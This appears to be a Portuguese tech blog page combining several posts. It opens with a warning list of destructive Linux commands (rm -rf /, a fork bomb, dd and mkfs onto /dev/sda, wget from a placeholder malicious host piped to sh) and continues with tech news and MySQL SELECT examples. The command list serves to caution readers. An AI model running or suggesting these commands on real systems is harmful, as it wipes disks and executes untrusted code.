Clique para visualizar:

9 Comandos perigosos linux que você deve conhecer para tomar cuidado

A linha de comando no GNU/Linux é muito produtiva, útil e interessante, no entanto, às vezes pode ser muito perigoso, principalmente se tratando do usuário root, ou do usuário que pode assumir a maioria dos seus privilégios, o sudo. É necessário saber exatamente o que está fazendo. Esse artigo serve para alertá-los sobre alguns comandos do terminal, para não executá-los.

 1. rm -rf
O comando rm -rf é um dos maneira mais rápida de eliminar uma pasta e seu conteúdo. Mas um pouco de erro de digitação ou ignorância pode resultar em danos no sistema irrecuperáveis. Algumas das opções usadas com o comando rm é:



rm -rf
comando rm no Linux é usado para apagar arquivos.
  • rm -r comando exclui a pasta de forma recursiva, mesmo a pasta vazia.
  • comando rm -f remove “apenas ler o arquivo ‘sem perguntar.
  • rm-rf / : Força eliminação de tudo no diretório raiz.
  • rm -rf * : Força eliminação de tudo no atual diretório diretório / trabalho.
  • rm -rf : Força supressão do atual diretórios e subdiretórios.
Por isso, tenha cuidado quando você está executando o comando rm -rf. Para evitar um acidente de excluir arquivos com o comando ‘rm’, crie um alias de comando ‘rm’ como ‘rm -i’ “.bashrc”, ele irá pedir-lhe para confirmar cada exclusão.

2. :(){:|:&};:



:(){:|:&};:
A descrição acima é o fork bomb. Ele opera através da definição de uma função chamada ‘:’, que se chama duas vezes, uma no primeiro plano e uma vez no fundo. Ele mantém em execução novamente e novamente até que o sistema congela.

3. comando > /dev/sda
O comando acima escreve a saída do ‘comando’ no bloco /dev/sda. O comando acima escreve dados brutos e todos os arquivos no bloco serão substituídos por dados brutos, resultando em perda total dos dados no bloco.

4. mv diretorio /dev/null
Tudo movido para /dev/null, desaparece do sistema.



mv /home/user/* /dev/null

5. wget http://malicious_source -O- | sh

O comando acima irá baixar um script a partir de uma fonte mal-intencionada e, em seguida, executá-lo. Comando wget irá baixar o script e sh irá executar o script baixado.
Nota: Você deve ser muito consciente da fonte de onde você está baixando pacotes e scripts. Só use esses scripts/aplicações que é baixado de uma fonte confiável.
6. mkfs.ext3 /dev/sda



mkfs.ext3 /dev/sda
O comando acima irá danificar os blocos do seu HD, e formatá-lo.

7. > arquivo



echo "Nada" > arquivo.conf
Qualquer arquivo importante do sistema, será substituído com esse redirecionador.
A forma exata de usá-lo é criar um arquivo backup:



cp arquivo arquivo.bkp
e redirecionar com 2 “maiores que”, » , se necessário, exemplo para um source.list:



echo "link pacote deb" >> /etc/apt/source.list

8. ^foo^bar
Este comando é usado para editar o comando anterior sem a necessidade de digitar novamente todo o comando novamente. Mas isso realmente pode ser problemático se você não tomou o risco de verificar cuidadosamente a mudança no comando original usando ^ ^ foo comando bar.

9. dd if=/dev/random of=/dev/sda



dd if=/dev/random of=/dev/sda
O comando acima irá acabar com o /dev/sda e escrever dados aleatórios para o bloco. Claro! Seu sistema seria deixado na fase inconsistente e irrecuperável.

Linux pode ficar vulnerável após ameaça de desenvolvedores contra inclusão

Greg Kroah, líder do núcleo Linux, anunciou recentemente o novo código de conduta para desenvolvedores que trabalham com o sistema operacional Linux. De acordo com Kroah, a ideia é que os ambientes corporativos que utilizam o sistema se tornem mais “humanos”, de maneira “amigável e receptiva”. Enquanto Kroah acredita que os desenvolvedores devam ser pessoas mais abertas para o mundo, uma ala conversadora não concordou e pior: está ameaçando tornar o sistema operacional vulnerável.
No interesse de fomentar um ambiente aberto e receptivo, nós colaboradores estamos trabalhando para tornar nossa comunidade livre de perseguições

O novo código de conduta deixa claro o seguinte: "No interesse de fomentar um ambiente aberto e receptivo, nós colaboradores estamos trabalhando para tornar nossa comunidade livre de perseguições, independente de idade, estatura, deficiência, etnia, características sexuais, identidade de gênero, nível de experiência, escolaridade, situação socioeconômica, nacionalidade, aparência, raça, religião, identidade e orientação sexual".

Baseado no Contributor Covenant, um documento open-source já usado por outras plataformas de criação.

Agora, como nota o pessoal do Meio Bit, desenvolvedores insatisfeitos com essa nova realidade ameaçam remover as licenças de códigos inclusos em patches e módulos do kernel. Isso significa que, a longo prazo, o sistema se tornaria vulnerável a ataques.

Entre as novas regras do código, está o banimento de qualquer colaborador que não seja respeitoso com outras pessoas, independentemente de gênero, etnia, idade etc. A questão levantada pelos desenvolvedores, obviamente, envolve a comunidade LGBTQ+.
A alternativa da comunidade Linux seria o “kill switch”: remover o código

Por causa da versão GPL 2 da licença do Linux, os desenvolvedores possuem direitos autorais sobre os códigos que criam e compartilham. A ameaça ataca nesse tempo: caso sejam impedidos de contribuir, os desenvolvedores contra o código de conduta poderão reclamar a propriedade sobre os patches implementados.

Dessa maneira, a alternativa da comunidade Linux seria o “kill switch”: remover o código. A longo prazo, caso isso aconteça, o kernel do Linux ficará com buracos e deixará muitos cantos da internet totalmente inseguros. Companhias que rodam com o sistema também estariam mais vulneráveis a ataques.

Fonte: https://meiobit.com/391006/linux-codigo-conduta-atrito-entre-desenvolvedores/

NASA determina o que está movimentando 'silenciosamente' o eixo da Terra

Por que os eixos de outros planetas sofrem alterações significativas enquanto o da Terra permanece relativamente estável? E o que na realidade influencia a posição do eixo terrestre? Especialistas da NASA estão com as respostas


Um pequeno deslocamento do eixo terrestre, descoberto há algumas décadas, está ligado não só ao fim da Era do Gelo, mas também ao movimento de lava e à redistribuição da massa de água nos oceanos, concluem geólogos da NASA em um artigo publicado na revista Earth and Planetary Science Letters.
"Acreditava-se tradicionalmente que somente o fim da Era do Gelo seria o principal motivo dos recentes deslocamentos do eixo da Terra. Elaboramos um modelo digital do processo e revelamos que existe não só um, mas três fatos", contou Surendra Adhikari, do Laboratório de Propulsão a Jato.


Em comparação com outros planetas do Sistema Solar, a Terra possui um eixo relativamente estável. Graças à interação gravitacional do nosso planeta com a Lua, nos últimos bilhões de anos a posição do eixo não sofreu mudanças drásticas, enquanto os eixos de Marte e Urano, por exemplo, realocaram-se em dezenas de graus.

No entanto, dados científicos mostram que o eixo terrestre está se deslocando, pouco a pouco, mas se deslocando a um pouco mais de 10 cm/ano em direção ao 74º de longitude oeste. Sendo assim, grande parte dos pesquisadores passou a acreditar que o fim da Era do Gelo não seria o bastante para causar alteração.
Na verificação de outras hipóteses, Adhikari e seus colegas criaram um modelo especial digital para monitorar processos na litosfera e hidrosfera que poderiam interferir no eixo terrestre. Como resultado, eles descobriram que a atividade subterrânea afeta mais significativamente a posição do eixo do que a Era do Gelo um dia afetou.
Os cientistas indicam que a pressão e localização da camada de gelo, a atividade sísmica, o movimento de lava e a redistribuição de água nos oceanos e em outros reservatórios interferem no eixo terrestre. Portanto, vale a pena analisar o conjunto de fatores para fazer previsões climáticas e avaliar passíveis consequências do aquecimento global.

Facebook começa a testar seu sistema de paquera

Com o 'Dating', a rede social de Zuckerberg embarcou nesta semana em uma nova missão: fazer você achar o amor da sua vida




De todas as redes sociais que existem, dificilmente alguém vai citar o Facebook como uma das mais românticas. Faltam recursos que facilitem o sucesso de flertes e paqueras em geral – fora a tendência entre os mais jovens de cancelar as contas ou simplesmente manterem cada vez menos papos por lá.
Pare para pensar: fazer postagens ou comentários nas timelines é algo público além da conta. Você não sabe até quem o post vai chegar – e, portanto, só encaram tanta exposição os casais já estabelecidos, que querem mostrar seu amor para o mundo.
Para mensagens privadas já existe o Whatsapp, uma alternativa até mais completa que o Messenger, já que tem a vantagem de oferecer feedback de leitura em tempo real. Interações pelos stories do Instagram estão ficando progressivamente populares, justamente na parcela da população para a qual o Face já perdeu força. Isso sem falar de toda a sorte de apps criados exclusivamente para a paquera, como Tinder, Poppin, Happn, Grindr e equivalentes.
Se você está no Facebook faz tempo, deve lembrar das Cutucadas. Por um tempo, foi um recurso superpromovido pelo Facebook. Hoje, apesar de ainda existir, foi praticamente escondido. A verdade é que o botão de cutucar foi criado pelo Facebook como uma forma de iniciar conversas… Mas rapidamente ganhou má fama. Ele tende mais a fazer você parecer mais um stalker do que alguém que está tentando uma aproximação bem-intencionada.

Hacker encontra bug na Apple Pay e compra 500 iPhones a US$ 0,03

O engenheiro de computação Chang Chi-yuan encontrou uma falha na carteira digital da Apple, a Apple Pay, e conseguiu comprar 500 iPhones 8 Plus de 256 GB e dois iPhones Xs Max de 512 GB a 1 dólar taiwanês, o que é o equivalente a US$ 0,03 (R$ 0,12). No total, as mercadorias custam US$ 539 mil (quase R$ 2 milhões na conversão direta).
Chang diz que simplesmente arriscou pagar somente um dólar taiwanês por produto e, para sua surpresa, o sistema aceitou. Para comprovar sua proeza, ele até mesmo tirou cópias da tela de pagamento e postou em sua página no Facebook, veja:



Embora tenha conseguido esse baita “desconto”, Chang em seguida cancelou o pedido — talvez com medo de ter que arcar com os custos reais caso fosse descoberto.
O hacker — na verdade um cracker, que se dedica a quebrar sistemas de segurança — ficou famoso em 2013, quando deletou uma série de posts de Mark Zuckerberg na própria rede social, apenas para apontar uma brecha na plataforma depois de ser ignorado pelo suporte técnico. Ele mesmo já havia conseguido comprar um iPhone em 2016, após um bug semelhante do desta vez, uma falha que foi rapidamente corrigida na época.

Veja aqui no forensetux os 10 Hackers que marcaram à historia.

Revelado segredo do material mais rígido do Universo

A pasta nuclear, uma substância rara que se acredita existir em estrelas mortas ultradensas chamadas de estrelas de nêutrons, pode ser mais rígida do que qualquer outro material conhecido no Universo, revela novo estudo publicado na Physical Review Letters.
Para quebrar a pasta nuclear é necessária uma força 10 bilhões de vezes maior do que a empregada para romper o aço.

"Este é um número absurdamente alto, mas o material também é muito denso, o que ajuda a torná-lo mais forte", esclarece o coautor do estudo, Charles Horowitz, da Universidade de Indiana (EUA), citado pela Science News.
A pasta nuclear é incrivelmente densa, cerca de 100 trilhões de vezes a mais que a água. Os pesquisadores usaram simulações de computador para esticar as lâminas da "lasanha nuclear" e estudar como o material reagia. Pressões extremamente altas eram requeridas para deformar a substância e a pressão necessária para quebrá-la era maior do que a usada para quebrar qualquer outro material conhecido.
Simulações anteriores revelaram a força da crosta externa de uma estrela de nêutrons, mas a crosta interna, que abriga a pasta nuclear, era território inexplorado até agora.
"Agora, podemos ver que a crosta interna é muito mais forte", concluíram os pesquisadores do estudo.
Estrelas de nêutrons são formadas quando uma estrela moribunda explode, deixando um remanescente rico em nêutrons comprimido a pressões extremas por forças gravitacionais poderosas, resultando em materiais com propriedades estranhas.
Os cientistas esperam que, no futuro, com a ajuda do observatório de ondas gravitacionais com interferometria a laser LIGO, seja possível confirmar que as estrelas de nêutrons têm materiais extremamente fortes em suas crostas.
"Agora, podemos ver que a crosta interna é muito mais forte", concluíram os pesquisadores do estudo.

Como é criada?
Estrelas de nêutrons são formadas quando uma estrela moribunda explode, deixando um remanescente rico em nêutrons comprimido a pressões extremas por forças gravitacionais poderosas, resultando em materiais com propriedades estranhas.
Os cientistas esperam que, no futuro, com a ajuda do observatório de ondas gravitacionais com interferometria a laser LIGO, seja possível confirmar que as estrelas de nêutrons têm materiais extremamente fortes em suas crostas.

Polícia Civil busca quadrilha especializada em crimes cibernéticos

A Polícia Civil do Rio de Janeiro cumpre nesta segunda-feira (17) 45 mandados de prisão contra acusados de integrar uma quadrilha nacional especializada em crimes cibernéticos e lavagem de dinheiro. Os mandados estão sendo cumpridos em seis estados: São Paulo, Paraná, Minas Gerais, Santa Catarina e Bahia, além do Rio de Janeiro.
Os investigados foram denunciados pelo Grupo de Atuação Especial de Combate ao Crime Organizado (Gaeco), do Ministério Público do Rio de Janeiro, pela prática de crimes patrimoniais, com subtração de valores das contas bancárias por meio de transações fraudulentas, além de lavagem de dinheiro e organização criminosa.
Ao todo, 237 pessoas estão envolvidas no esquema fraudulento. Esta é a segunda etapa da Operação Open Doors, cuja primeira fase foi desencadeada em agosto de 2017.
Uma das fraudes aplicadas pelo grupo é o envio aleatório de e-mails e mensagens por celular a milhares de pessoas. As mensagens eram identificadas como sendo de instituições bancárias e pediam para que os clientes atualizassem suas senhas clicando em um endereço específico na internet.
Ao clicar nesses endereços, as vítimas eram direcionadas a websites com programas capazes de capturar informações de contas e senhas, que permitiam à quadrilha retirar quantias dessas contas de forma fraudulenta.
Outro golpe do grupo, que causava prejuízos ainda maiores segundo o Ministério Público (chegando a R$ 500 mil em alguns casos), era a ligação telefônica para potenciais vítimas. Os fraudadores se faziam passar por funcionários de bancos para obter dados pessoais. Entre os alvos estavam inclusive funcionários do setor financeiro de grandes empresas.
“Os integrantes da organização adotaram mecanismos para camuflar a origem ilícita do produto de seus crimes econômicos, na figura típica conhecida como lavagem de dinheiro, por meio da utilização de ‘laranjas’ na compra de terrenos, apartamentos e salas comerciais e para a ocultação de patrimônio”, diz nota do MP.

Linus Torvalds tira licença e pede desculpas por comportamento

O criador do sistema de código aberto Linux, Linus Torvalds, resolveu tirar uma licença temporária, conforme revelou em um longo e-mail enviado à comunidade da plataforma no domingo, 16/9. As informações são da CNBC.
Na mensagem em questão, aponta a rede americana, Torvalds pede desculpas pelo seu comportamento, que definiu como "não profissional e desnecessário", e diz que irá se afastar temporariamente para procurar ajuda.
“Preciso mudar parte do meu comportamento, e quero me desculpar com as pessoas que o meu comportamento pessoal possa ter machucado e possivelmente afastado totalmente do desenvolvimento do kernel”, afirmou.
Em outro trecho do e-mail, o criador do Linux diz que irá procurar por assistência durante esse período de licença. “Vou tirar um tempo de licença e buscar alguma ajuda sobre como compreender as emoções das pessoas e responder de forma apropriada.”
Por fim, Torvalds deixa claro que não quer se afastar da plataforma open-source. “Esse não é o tipo de coisa ‘Estou exausto, apenas preciso ir embora’. Não estou sentindo que não quero continuar mantendo o Linux. Totalmente o contrário. Eu realmente quero continuar fazendo esse projeto em que venho trabalhando há quase três décadas.”

DevOps entenda o que é

O que é DevOps” é uma pergunta mais difícil de se responder do que parece à primeira vista. Mas é possível apontar vários objetivos da prática de DevOps: velocidade e qualidade na entrega de valor, uso extensivo de automação para construção e testes, redução dos períodos em que as aplicações ficam fora do ar (downtimes),  eliminação do atrito entre desenvolvedores e operação e redução do tempo para lidar com falhas.
DevOps tem a meta principal melhorar a integração entre desenvolvedores de softwares e a equipe de infraestrutura. Em uma TI tradicional, a comunicação entre os dois sujeitos ainda é muito difícil: desenvolvedores são cobrados por entregar valor na forma de funcionalidades em aplicações, enquanto a operação (infra) é cobrada por manter a estabilidade do ambiente. Ambos são pressionados pela empresa em direção a esses objetivos, mas em uma TI tradicional eles parecem opostos.

Com o modelo de produção antigo este conflito é uma consequência natural: desenvolvedores têm pouco ou nenhum contato com o ambiente produtivo de suas entregas, assim como o formalismo imposto pelos silos operacionais tornam cada iteração uma repetição de problemas recorrentes.
Mas a prática e ferramental DevOps permitem que essa comunicação seja facilitada, modificando completamente as fronteiras de responsabilidade e favorecendo o trabalho de ambos os times, tornando muito mais fluida a entrega de valor no ambiente de tecnologia dentro de uma empresa.

Como era antes do DevOps?

Para começar a entender o modelo antigo de produção tecnológica, vamos lembrar do nosso ensino médio quando estudamos Revolução Industrial. Existia uma grande demanda por produtos manufaturados e foi necessária uma espécie de esteira de montagem para agilizar o processo.
Essa lógica também foi implementada na construção de software no modelo em cascata, que consistia no levantamento de requisitos, projeto, implementação, teste, implantação e manutenção. Frequentemente  (muito mesmo!) ele gerava problemas de toda ordem.
Um dos problemas é que a tecnologia possui um dinamismo avassalador, que faz com que os requisitos sejam alterados a todo o tempo. Outra dificuldade é que o cliente dificilmente sabe exatamente o que quer quando pede um software – e mesmo quando sabe, frequentemente está errado, pois o que o usuário final realmente precisa pode ser ainda diferente.
Por essa razão, fez-se necessária a criação de metodologias ágeis para conduzir projetos de software, e estas mesmas metodologias demandaram práticas e ferramentas totalmente diferentes das que estavam em uso até então, reordenando completamente as fronteiras que definiam os papéis de desenvolvimento e infraestrutura. Como dissemos no início do texto, não existe uma fórmula mágica de fazer DevOps, mas vamos indicar as práticas mais comuns e suas ferramentas. Confira abaixo!

União DevOps/Agile

Você se lembra quando falamos do problemático modelo de desenvolvimento em cascata? Ao longo dos anos várias outras metodologias foram experimentadas pela indústria de TI. Os métodos ágeis têm a hegemonia atual porque assumem explicitamente que a produção de aplicações é um ciclo contínuo e que o excesso de formalismo na coleta de requisitos é perda de tempo.
A prática DevOps possui algumas diretrizes: Algumas utilizam ferramentas que propiciam colaboração e integração contínua entre Desenvolvimento e Infraestrutura. Elaboramos um esquema abaixo que ilustra de forma resumida a adoção de DevOps, mas ao longo do nosso conteúdo explicaremos melhor pontos interessantes na hora de adotar a prática.

MySQL - função CONCAT

Combine valores dos registros e altere a exibição do relatório, com a função CONCAT

Você pode combinar a exibição de valores com a função CONCAT, dentro de um SELECT. Ao usar este recurso, o MySQL cria um novo campo (apenas para exibição), contendo os valores concatenados/combinados.
No exemplo abaixo vou mostrar como combinar os campos nome_projeto e data_inicio_projeto dentro de um novo campo, chamado Detalhes:


SELECT id_projeto, CONCAT('projeto ', nome_projeto, ' iniciado em ', data_inicio_projeto) 
AS Detalhes, valor_projeto FROM projetos WHERE valor_projeto > 3000000;
 
 +------------+------------------------------------------------------+---------------+
| id_projeto | Detalhes                                             | valor_projeto |
+------------+------------------------------------------------------+---------------+
|         13 | projeto Uppingham. Cottesmore iniciado em 19-11-2013 |       3483467 |
|         73 | projeto Lourdes iniciado em 24-05-2013               |       3489422 |
|         89 | projeto Moose Jaw iniciado em 19-06-2013             |       3119981 |
+------------+------------------------------------------------------+---------------+
3 rows in set (0.00 sec)

Para a lista não ficar muito extensa, no exemplo acima, restringi os projetos a serem exibidos aos que têm valores acima de 3000000.
A lista ficaria melhor, ainda, se as datas fossem exibidas em ordem ascendente:


SELECT id_projeto, CONCAT('projeto ', nome_projeto, ' iniciado em ', data_inicio_projeto) 
AS Detalhes, valor_projeto FROM projetos WHERE valor_projeto > 3000000 
ORDER BY data_inicio_projeto ASC;
 
 +------------+------------------------------------------------------+---------------+
| id_projeto | Detalhes                                             | valor_projeto |
+------------+------------------------------------------------------+---------------+
|         89 | projeto Moose Jaw iniciado em 19-06-2013             |       3119981 |
|         13 | projeto Uppingham. Cottesmore iniciado em 19-11-2013 |       3483467 |
|         73 | projeto Lourdes iniciado em 24-05-2013               |       3489422 |
+------------+------------------------------------------------------+---------------+
3 rows in set (0.00 sec)

MySQL - Exemplo de SELECT simples

A linguagem SQL foi criada com o objetivo de padronizar os comandos de manipulação de dados em SGBD’s. Hoje em dia, apesar de a linguagem possuir uma quantidade considerável de extensões e implementações proprietárias, pode-se afirmar que a meta foi alcançada. Conhecendo bem a linguagem é possível acessar os recursos básicos de qualquer banco relacional, como Oracle, SQL Server ou MySQL, sem praticamente nenhuma mudança.

O comando SELECT permite recuperar os dados de um objeto do banco de dados, como uma tabela, view e, em alguns casos, uma stored procedure (alguns bancos de dados permitem a criação de procedimentos que retornam valor). A sintaxe mais básica do comando é:

SELECT * FROM projetos;

Abaixo, você pode ver o resultado do comando (clique no ícone view source, no canto superior direito, para ver melhor)

+-----+------------+------------+----------------------+--------------------+------------------+
| id  | id_projeto | id_cliente | nome_projeto         | data_inicio_projeto | data_fim_projeto|                                                       
+-----+------------+------------+----------------------+--------------------+------------------+
|   1 |          1 |        557 | Forensetux           | 15-09-2013         | 09-09-2014       |                                                                   
|   2 |          2 |        863 | Kent                 | 18-06-2013         | 10-04-2014       | 
|   3 |          3 |        192 | Moradabad            | 10-04-2013         | 01-05-2014       |  
|   4 |          4 |        671 | Lithgow              | 15-07-2013         | 26-05-2014       | 
|   5 |          5 |        440 | Bowden               | 14-12-2013         | 07-03-2014       | 
+-----+------------+------------+----------------------+--------------------+------------------+
5 rows in set (0.14 sec)
 
 
O símbolo * significa all ou todas as colunas, neste caso.
Você pode especificar quais colunas, exatamente, deseja ver, ao descrevê-las no lugar do *.
No exemplo, abaixo, vou pedir para que apenas as colunas id_projeto e nome_projeto sejam exibidas:
SELECT id_projeto, nome_projeto FROM projetos;

E, como resultado, obtenho o seguinte:
+------------+----------------------+
| id_projeto | nome_projeto         |
+------------+----------------------+
|          1 | Forensetux           |
|          2 | Kent                 |
|          3 | Moradabad            |
|          4 | Lithgow              |
|          5 | Bowden               |
+------------+----------------------+
10 rows in set (0.01 sec)
 
 

Python remove termos “mestre” e “escravo” por serem considerados ofensivos

A linguagem de programação Python, uma das mais populares do mundo, vai deixar de usar os termos “mestre” e “escravo”. Em tecnologia, essas palavras se referem a um componente que tem controle total sobre outros (master), ou que é controlado por outros componentes (slave). No entanto, isso motivou um debate acalorado sobre escravidão e diversidade.


“Por motivos de diversidade, seria bom tentar evitar a terminologia ‘mestre’ e ‘escravo’, que pode ser associada à escravidão”, escreve Victor Stinner, desenvolvedor na Red Hat. Ele fez um “pull request” — uma proposta de mudança no código — para remover os dois termos da linguagem Python.
Assim começou uma enorme discussão com argumentos a favor e contra a proposta. O criador do Python, Guido van Rossum, se aposentou em julho mas voltou para resolver a polêmica: “três dos quatro pull requests de Victor foram mesclados”, isto é, foram aceitos.
Daqui para a frente, o termo “escravo” será substituído por “workers” ou “helpers”, e “master process” virou “parent process”.
Nos comentários, o desenvolvedor Raymond Hettinger foi um dos que discordou da mudança: “não deveríamos deixar que noções vagas do politicamente correto moldem usos do inglês”, ele escreve. “É realmente necessário poluir a base de código do Python com a ideologia/terminologia de SJWs [justiceiros sociais]?”, perguntou Gabriel Marko.

 O mais interessante disso foi os comentários dos internautas, veja alguns:

"Como assim PARENT process?
Isso ofende muito os órfãos. Quem é o sem coração que quer ofender órfãos?"

"Minha opinião sobre esse assunto se resume a uma palavra: FRESCURA!"

"Fui até um depósito de hardware antigo e removi os jumpers de TODOS os dispositivos IDE que encontrei, agora são todos iguais."